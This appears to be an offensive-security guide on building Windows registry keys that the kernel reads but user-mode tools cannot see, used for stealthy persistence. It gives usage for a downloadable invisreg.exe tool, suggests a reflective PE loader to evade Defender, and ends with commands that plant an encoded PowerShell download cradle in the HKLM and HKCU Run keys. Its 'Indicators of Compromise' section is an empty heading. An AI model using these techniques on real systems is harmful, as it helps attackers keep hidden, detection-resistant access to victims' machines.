Invisible Registry Keys


It's possible to craft invisible registry keys that the Windows NT kernel is able to read, but not any user-mode applications. This allows for some unique cases of persistence that is hard to detect from the defenders perspective.


The target must be windows, and you must run this tool with the appropriate access rights required for the hive you're trying to write to. HKLM requires Administrator/SYSTEM privileges, HKCU can be modified by the current user.


This setup requires downloading and executing the following utility, defender may or may not catch this file on disk. Potentially use a reflective PE loader to avoid this issue. The executable in question can be found at this repo. Go to Releases and download the latest executable, compilation is not required.


Method 1 - invisreg.exe

Running invisreg.exe without any options will provide the following output:

Usage: invisreg [operation] [path] [type] [value]
         create - Create a new invisible registry key
         edit   - Edit an existing invisible registry key
         delete - Delete an existing invisible registry key
         query  - Query an invisible registry key
         Like this - HKLM:\PATH\TO\KEY
         supported hives:
           HKLM        - HKEY_LOCAL_MACHINE
           HKCR        - HKEY_CLASSES_ROOT
           HKCC        - HKEY_CURRENT_CONFIG
           HKU         - HKEY_USERS
         REG_SZ        - Value is expected to be a string
         REG_DWORD     - Value is expected to be a 32-bit integer
         REG_QWORD     - Value is expected to be a 64-bit integer
         REG_BINARY    - Value is expected to be the name of a file

       invisreg create HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName REG_SZ "calc.exe"
       invisreg edit HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName REG_DWORD 1337
       invisreg delete HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName
       invisreg query HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName

To install a powershell cradle into the run key for persistence, the following command can be used:

.\invisreg.exe create HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\Cradle REG_SZ "powershell -enc <base64>"

Or for a specific user:

.\invisreg.exe create HKCU:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\Cradle REG_SZ "powershell -enc <base64>"

Indicators of Compromise